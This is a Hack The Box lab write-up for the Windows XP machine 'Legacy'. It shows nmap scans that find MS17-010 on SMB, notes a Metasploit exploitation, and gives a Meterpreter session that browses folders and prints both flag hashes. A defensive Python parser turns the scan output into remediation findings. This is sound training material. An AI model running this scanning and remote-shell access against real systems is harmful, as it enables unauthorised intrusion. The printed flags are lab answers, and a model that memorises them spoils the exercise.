# Legacy

#### About this machine: HTB

Operating system: Windows

**Skills used**:

* EternalBlue exploitation

Methodology:

Initial reconnaissance scan with nmap:

```
❯ nmap -T4 -sS -Pn -p- --open -n 10.10.10.4 -oN first_scan

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-04 20:08 EDT
Stats: 0:00:01 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.06% done
Stats: 0:00:27 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 35.00% done; ETC: 20:09 (0:00:50 remaining)
Nmap scan report for 10.10.10.4
Host is up (0.16s latency).
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
```

We run a version scan and the default scripts against the open ports:

```
❯ nmap -T4 -sS -Pn -p135,139,445 -sVC -n 10.10.10.4 -oN sV_scan

PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2025-05-10T05:07:40+03:00
|_smb2-time: Protocol negotiation failed (SMB2)
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b0:4c:57 (VMware)
|_clock-skew: mean: 5d00h27m31s, deviation: 2h07m16s, median: 4d22h57m31s
```

We look for known vulnerabilities on port 445 (SMB) with the safe vulnerability scripts:

```
❯ nmap --script "vuln and safe" -p445 10.10.10.4

PORT    STATE SERVICE
445/tcp open  microsoft-ds
Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
```
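The two scans above are what a blue team would triage: SMB signing disabled, an end-of-life OS, SMBv1 only, and an unpatched MS17-010. As an added example (not part of the original writeup), this parser groups nmap's NSE host-script output by script name and turns it into remediation findings; the sample input is a constructed, re-indented excerpt of the outputs shown on this page.

```python
import re

# Constructed sample: the "Host script results" part of the two nmap runs above, re-indented as nmap prints it.
NMAP_OUTPUT = """\
Host script results:
| smb-security-mode:
|   account_used: guest
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-vuln-ms17-010:
|   VULNERABLE:
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
"""

HEADER = re.compile(r"([A-Za-z0-9-]+):\s*(.*)")


def parse_host_scripts(text):
    """Group NSE host-script lines by script name -> {name: [body lines]}."""
    # A script header sits at indent 0-1 after the '|' / '|_' prefix; body lines are indented deeper.
    scripts, current = {}, None
    for line in text.splitlines():
        if not line.startswith("|"):
            continue
        raw = line.lstrip("|_")
        indent = len(raw) - len(raw.lstrip(" "))
        m = HEADER.fullmatch(raw.strip())
        if m and indent <= 1:
            current = m.group(1)
            scripts[current] = [m.group(2)] if m.group(2) else []
        elif current is not None and raw.strip():
            scripts[current].append(raw.strip())
    return scripts


def triage(scripts):
    """Turn parsed script output into defender-facing findings (list of strings)."""
    findings = []
    if any(ln.startswith("message_signing: disabled") for ln in scripts.get("smb-security-mode", [])):
        findings.append("SMB signing disabled: enforce message signing")
    vuln = scripts.get("smb-vuln-ms17-010", [])
    if any(ln.startswith("State: VULNERABLE") for ln in vuln):
        cves = sorted(set(re.findall(r"CVE-\d{4}-\d+", " ".join(vuln))))
        findings.append("MS17-010 unpatched (%s): patch or disable SMBv1" % ", ".join(cves))
    if any("Windows XP" in ln for ln in scripts.get("smb-os-discovery", [])):
        findings.append("Windows XP: end-of-life OS, no security updates")
    if any("negotiation failed" in ln for ln in scripts.get("smb2-time", [])):
        findings.append("SMB2 negotiation failed: host speaks only SMBv1")
    return findings
```

Feed it the normal (`-oN`) output of a real scan to get the same four findings for this host.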

We find that the host is vulnerable to CVE-2017-0143 (MS17-010), so we exploit it with Metasploit.

It worked and we are in; now we look for the flags:

```
(Meterpreter 1)(C:\windows) > cd /

(Meterpreter 1)(C:) > dir

Listing: C:\

Mode              Size    Type  Last modified              Name

100777/rwxrwxrwx  0       fil   2017-03-16 01:30:44 -0400  AUTOEXEC.BAT
100666/rw-rw-rw-  0       fil   2017-03-16 01:30:44 -0400  CONFIG.SYS
040777/rwxrwxrwx  0       dir   2017-03-16 02:07:20 -0400  Documents and Settings
100444/r--r--r--  0       fil   2017-03-16 01:30:44 -0400  IO.SYS
100444/r--r--r--  0       fil   2017-03-16 01:30:44 -0400  MSDOS.SYS
100555/r-xr-xr-x  47564   fil   2008-04-13 16:13:04 -0400  NTDETECT.COM
040555/r-xr-xr-x  0       dir   2017-12-29 15:41:18 -0500  Program Files
040777/rwxrwxrwx  0       dir   2017-03-16 01:32:59 -0400  System Volume Information
040777/rwxrwxrwx  0       dir   2025-05-09 22:27:02 -0400  WINDOWS
100666/rw-rw-rw-  211     fil   2017-03-16 01:26:58 -0400  boot.ini
100444/r--r--r--  250048  fil   2008-04-13 18:01:44 -0400  ntldr
000000/---------  0       fif   1969-12-31 19:00:00 -0500  pagefile.sys

(Meterpreter 1)(C:) > cd /Documents and Settings

[-] stdapi_fs_chdir: Operation failed: The system cannot find the file specified.

(Meterpreter 1)(C:) > cd DOCUME~1

(Meterpreter 1)(C:\DOCUME~1) > dir

Listing: C:\DOCUME~1

Mode              Size  Type  Last modified              Name

040777/rwxrwxrwx  0     dir   2017-03-16 02:07:21 -0400  Administrator
040777/rwxrwxrwx  0     dir   2017-03-16 01:29:48 -0400  All Users
040777/rwxrwxrwx  0     dir   2017-03-16 01:33:37 -0400  Default User
040777/rwxrwxrwx  0     dir   2017-03-16 01:32:52 -0400  LocalService
040777/rwxrwxrwx  0     dir   2017-03-16 01:32:43 -0400  NetworkService
040777/rwxrwxrwx  0     dir   2017-03-16 01:33:42 -0400  john

(Meterpreter 1)(C:\DOCUME~1) > cd Administrator

(Meterpreter 1)(C:\DOCUME~1\Administrator) > dir

Listing: C:\DOCUME~1\Administrator

Mode              Size    Type  Last modified              Name

040555/r-xr-xr-x  0       dir   2017-03-16 02:07:29 -0400  Application Data
040777/rwxrwxrwx  0       dir   2017-03-16 01:32:27 -0400  Cookies
040777/rwxrwxrwx  0       dir   2017-03-16 02:18:27 -0400  Desktop
040555/r-xr-xr-x  0       dir   2017-03-16 02:07:32 -0400  Favorites
040777/rwxrwxrwx  0       dir   2017-03-16 01:20:48 -0400  Local Settings
040555/r-xr-xr-x  0       dir   2017-03-16 02:07:31 -0400  My Documents
100666/rw-rw-rw-  786432  fil   2022-05-28 06:28:03 -0400  NTUSER.DAT
100666/rw-rw-rw-  1024    fil   2025-05-09 13:22:42 -0400  NTUSER.DAT.LOG
040777/rwxrwxrwx  0       dir   2017-03-16 01:20:48 -0400  NetHood
040777/rwxrwxrwx  0       dir   2017-03-16 01:20:48 -0400  PrintHood
040555/r-xr-xr-x  0       dir   2017-03-16 02:07:31 -0400  Recent
040555/r-xr-xr-x  0       dir   2017-03-16 02:07:24 -0400  SendTo
040555/r-xr-xr-x  0       dir   2017-03-16 01:20:48 -0400  Start Menu
040777/rwxrwxrwx  0       dir   2017-03-16 01:28:41 -0400  Templates
100666/rw-rw-rw-  178     fil   2022-05-28 06:28:03 -0400  ntuser.ini

(Meterpreter 1)(C:\DOCUME~1\Administrator) > cd Desktop

(Meterpreter 1)(C:\DOCUME~1\Administrator\Desktop) > dir

Listing: C:\DOCUME~1\Administrator\Desktop

Mode              Size  Type  Last modified              Name

100444/r--r--r--  32    fil   2017-03-16 02:18:50 -0400  root.txt

(Meterpreter 1)(C:\DOCUME~1\Administrator\Desktop) > cat root.txt

993442d258b0e0ec917cae9e695d5713

(Meterpreter 1)(C:\DOCUME~1) > dir

Listing: C:\DOCUME~1

Mode              Size  Type  Last modified              Name

040777/rwxrwxrwx  0     dir   2017-03-16 02:07:21 -0400  Administrator
040777/rwxrwxrwx  0     dir   2017-03-16 01:29:48 -0400  All Users
040777/rwxrwxrwx  0     dir   2017-03-16 01:33:37 -0400  Default User
040777/rwxrwxrwx  0     dir   2017-03-16 01:32:52 -0400  LocalService
040777/rwxrwxrwx  0     dir   2017-03-16 01:32:43 -0400  NetworkService
040777/rwxrwxrwx  0     dir   2017-03-16 01:33:42 -0400  john

(Meterpreter 1)(C:\DOCUME~1) > cd /all_users

[-] stdapi_fs_chdir: Operation failed: The system cannot find the file specified.

(Meterpreter 1)(C:\DOCUME~1) > cd john

(Meterpreter 1)(C:\DOCUME~1\john) > dir

Listing: C:\DOCUME~1\john

Mode              Size    Type  Last modified              Name

040555/r-xr-xr-x  0       dir   2017-03-16 01:33:50 -0400  Application Data
040777/rwxrwxrwx  0       dir   2017-03-16 01:32:27 -0400  Cookies
040777/rwxrwxrwx  0       dir   2017-03-16 02:19:33 -0400  Desktop
040555/r-xr-xr-x  0       dir   2017-03-16 01:33:55 -0400  Favorites
040777/rwxrwxrwx  0       dir   2017-03-16 01:20:48 -0400  Local Settings
040555/r-xr-xr-x  0       dir   2017-03-16 01:33:54 -0400  My Documents
100666/rw-rw-rw-  524288  fil   2017-03-16 02:19:59 -0400  NTUSER.DAT
100666/rw-rw-rw-  1024    fil   2025-05-09 13:22:42 -0400  NTUSER.DAT.LOG
040777/rwxrwxrwx  0       dir   2017-03-16 01:20:48 -0400  NetHood
040777/rwxrwxrwx  0       dir   2017-03-16 01:20:48 -0400  PrintHood
040555/r-xr-xr-x  0       dir   2017-03-16 01:33:54 -0400  Recent
040555/r-xr-xr-x  0       dir   2017-03-16 01:33:44 -0400  SendTo
040555/r-xr-xr-x  0       dir   2017-03-16 01:20:48 -0400  Start Menu
040777/rwxrwxrwx  0       dir   2017-03-16 01:28:41 -0400  Templates
100666/rw-rw-rw-  178     fil   2017-03-16 02:19:59 -0400  ntuser.ini

(Meterpreter 1)(C:\DOCUME~1\john) > cd Desktop

(Meterpreter 1)(C:\DOCUME~1\john\Desktop) > dir

Listing: C:\DOCUME~1\john\Desktop

Mode              Size  Type  Last modified              Name

100444/r--r--r--  32    fil   2017-03-16 02:19:49 -0400  user.txt

(Meterpreter 1)(C:\DOCUME~1\john\Desktop) > cat user.txt

e69af0e4f443de7e36876fda4ec7644f
```

With both flags obtained, the Legacy machine is complete.
